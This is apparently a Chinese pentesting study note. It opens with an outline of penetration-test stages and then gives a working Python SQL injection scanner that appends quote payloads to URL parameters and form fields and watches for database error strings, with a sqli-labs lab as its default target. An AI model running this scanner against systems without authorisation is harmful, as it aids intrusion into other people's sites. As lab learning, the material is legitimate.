:::info
💘渗透全流程:
信息收集 – 漏洞发现 – 漏洞👣利用 – 权限提升 – 隧道搭建 – 内网渗透 – 横向移动 – 后渗透
:::
SQL注入扫描器
参考 sqlmap
- 构造参数,sql 逃逸
- 发送请求
- 分析回显
V1.0
#! /usr/bin/env python
'''
SQL Inject Scaner
'''
import sys
from urllib.parse import parse_qsl, urlencode, urljoin, urlsplit, urlunsplit

import requests
from bs4 import BeautifulSoup
from fake_useragent import UserAgent
# One shared HTTP session for the whole scan, so any cookies the target sets
# (session ids, CSRF cookies) are carried into the later form probes.
# The User-Agent is randomised once per run via fake_useragent.
ua = UserAgent()
s = requests.Session()
s.headers.update({'User-Agent': ua.random})
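def get_all_forms(url, timeout=10):
    """Fetch *url* with the shared session and return all of its <form> tags.

    Args:
        url: Page to fetch.
        timeout: Seconds to wait for connect/response. The first version had
            no timeout, so an unresponsive target blocked the scanner forever.

    Returns:
        list of bs4 Tag objects, one per <form>; empty if the page has none.

    Raises:
        requests.RequestException on network failure. Deliberately not caught
        here so the caller learns why the scan stopped.
    """
    res = s.get(url, timeout=timeout)
    soup = BeautifulSoup(res.content, 'lxml')
    return soup.find_all('form')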
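def get_form_details(form):
    """Extract action, method and input fields from a <form> tag.

    Args:
        form: bs4 Tag for a <form> element.

    Returns:
        dict with keys:
          'action' - the ``action`` attribute verbatim, or None when absent.
              It is no longer lower-cased: URL paths are case-sensitive on
              most servers, so lower-casing could point the probe at a
              non-existent endpoint.
          'method' - the ``method`` attribute lower-cased, default 'get'.
          'inputs' - one {'type', 'name', 'value'} dict per <input>;
              'type' defaults to 'text', 'name' and 'value' to None.
              Only <input> elements are collected; <select> and <textarea>
              fields are not.
    """
    action = form.attrs.get('action')
    method = form.attrs.get('method', 'get').lower()
    inputs = [
        {
            'type': tag.attrs.get('type', 'text'),
            'name': tag.attrs.get('name'),
            'value': tag.attrs.get('value'),
        }
        for tag in form.find_all('input')
    ]
    return {'action': action, 'method': method, 'inputs': inputs}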
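# Error-based detection only: fragments of DBMS error text that leak into the
# HTTP body when an unbalanced quote breaks the query. Matched against the
# lower-cased body, so keep the entries lower-case.
SQL_ERRORS = frozenset({
    # MySQL
    'you have an error in your sql syntax',
    # PHP mysql_* warning. The original signature is kept; the second form is
    # how PHP actually prints it ("Warning: mysql_fetch_array() ...") when
    # html_errors is off. The HTML-tagged variant is still not caught.
    'warning:mysql',
    'warning: mysql',
    # MSSQL. Fixed spelling: the first version had 'charcter', which never
    # matched the real message.
    'unclosed quotation mark after the character string',
})


def is_vulnerable(response):
    """Return True if the response body contains a known SQL error fragment.

    Args:
        response: object with a ``content`` bytes attribute (requests.Response).

    Returns:
        bool. Decoding uses errors='replace' so a non-UTF-8 body (common on
        legacy targets) cannot abort the scan with UnicodeDecodeError.

    Caveats: a page that legitimately contains one of the strings is a false
    positive; blind or time-based injection gives no signal here at all.
    """
    body = response.content.decode('utf-8', errors='replace').lower()
    return any(err in body for err in SQL_ERRORS)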
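# Characters appended to each parameter value to break out of a quoted SQL
# literal. The first version listed `"'-)` and then overwrote the set with
# just the single quote, so only `'` was ever probed; that is kept here.
PAYLOADS = ("'",)


def _get_probe_urls(url, payload):
    """Yield one URL per query parameter with *payload* appended to its value.

    Appending to the whole URL (the original approach) only injects into the
    last parameter, and only if the URL ends with a value. When *url* has no
    query string there is nothing to target, so fall back to appending.
    urlencode() percent-encodes the quote; the server decodes it before it
    reaches the query, so the probe is equivalent to sending it raw.
    """
    parts = urlsplit(url)
    params = parse_qsl(parts.query, keep_blank_values=True)
    if not params:
        yield f"{url}{payload}"
        return
    for idx, (key, value) in enumerate(params):
        mutated = list(params)
        mutated[idx] = (key, value + payload)
        yield urlunsplit(parts._replace(query=urlencode(mutated)))


def _form_payload(inputs, payload):
    """Build the request body for one form with *payload* appended.

    Hidden fields and fields with a prefilled value keep that value (plus the
    payload) so tokens stay plausible; other non-submit fields get a dummy
    'test' value plus the payload. Nameless inputs are skipped: a browser
    never submits them, and the first version would have sent a field
    literally named 'None'. A hidden field with no value now yields just the
    payload instead of being dropped by a swallowed TypeError.
    """
    data = {}
    for field in inputs:
        name = field['name']
        if name is None:
            continue
        if field['type'] == 'hidden' or field['value']:
            data[name] = (field['value'] or '') + payload
        elif field['type'] != 'submit':
            data[name] = f'test{payload}'
    return data


def scan_sql_injection(url, timeout=10):
    """Probe *url* for error-based SQL injection and print findings.

    Only run this against systems you are authorised to test.

    Two passes:
      1. GET: each query-string value gets a quote appended
         (see _get_probe_urls). A hit ends the scan early, as before.
      2. Forms: every <form> on the page is submitted with the quote appended
         to its fields, using the form's own method. Methods other than GET
         and POST are skipped; the first version fell through with
         ``res = ''`` and crashed inside is_vulnerable.

    Each form's action is resolved against the page URL. The first version
    rebound ``url`` to the resolved action, so later forms were resolved
    against the previous form's action.

    Detection is signature based (is_vulnerable): a page that already
    contains an error string is a false positive, and blind injection is
    not detected.

    Args:
        url: Page (optionally with query string) to test.
        timeout: Per-request timeout in seconds; without one the scan hung
            on an unresponsive target.

    Returns:
        True if any probe triggered a SQL error signature, else False.
        Network errors on a single probe are reported and skipped rather
        than aborting the whole scan.
    """
    found = False
    for payload in PAYLOADS:
        for probe_url in _get_probe_urls(url, payload):
            print('[*] trying ... %s' % probe_url)
            try:
                res = s.get(probe_url, timeout=timeout)
            except requests.RequestException as exc:
                print('[-] request failed: %s' % exc)
                continue
            if is_vulnerable(res):
                print('[+] this url has sql injection vul...')
                return True

    for form in get_all_forms(url):
        form_details = get_form_details(form)
        # urljoin(url, None) returns url, matching the original behaviour for
        # forms without an action attribute.
        target = urljoin(url, form_details['action'])
        method = form_details['method']
        for payload in PAYLOADS:
            data = _form_payload(form_details['inputs'], payload)
            try:
                if method == 'post':
                    print('[*] try send a post method... data: %s' % data)
                    res = s.post(target, data=data, timeout=timeout)
                elif method == 'get':
                    print('[*] try send a get method... params: %s' % data)
                    res = s.get(target, params=data, timeout=timeout)
                else:
                    print('[-] unsupported form method %r, skipping' % method)
                    break
            except requests.RequestException as exc:
                print('[-] request failed: %s' % exc)
                continue
            if is_vulnerable(res):
                print('[+] this url has sql injection vul... \nparams: %s' % form_details)
                found = True
                break
    return found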
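if __name__ == '__main__':
    # Default target is the sqli-labs lesson used while writing this
    # (Less-11 exposes a login form; Less-1 with '?id=1' exercises the GET
    # probe instead). A URL given on the command line overrides it. Only
    # point this at hosts you are authorised to test.
    DEFAULT_URL = 'http://192.168.225.135/Less-11/'
    url = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_URL
    scan_sql_injection(url)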